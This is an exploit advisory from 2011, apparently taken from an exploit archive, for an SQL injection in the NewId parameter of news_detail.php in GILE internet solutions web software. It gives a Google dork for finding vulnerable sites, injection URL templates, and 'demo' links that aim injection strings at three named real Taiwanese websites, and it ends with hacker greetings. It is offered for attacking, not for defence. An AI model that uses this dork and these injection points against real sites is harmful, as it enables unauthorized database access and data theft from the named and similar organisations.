#Exploit Title: GILE internet solutions <= Sql Injection Vulnerability #date: 19/08/2011 #author: CriminalCoder #home Page: http://www.rootarea.org * http://www.el-kaide.com #my bl0g: http://beyz4de.wordpress.com #contact: criminalcoder[at]hotmail[Dot]de #vendor: http://www.gile.com.tw/ #version: All Versions #Category:: webapps #google d0rk: inurl:".tw/news_detail.php?NewId=" #tested on: Windows XP SP2 *********************************** >Exploit http://localhost/[path]/news_detail.php?NewId=1' http://localhost/[path]/news_detail.php?NewId=[inject here] >Demos http://www.kangfu.com.tw/news_detail.php?NewId='4 http://www.sprites.com.tw/news_detail.php?NewId='4 http://www.ju-feng.com.tw/news_detail.php?NewId='6 GreetZ;[NosLeeP]<>[CodeMaster]<>[3spi0n]<>[by_musti]<>[Vezir.04] good LucK :Z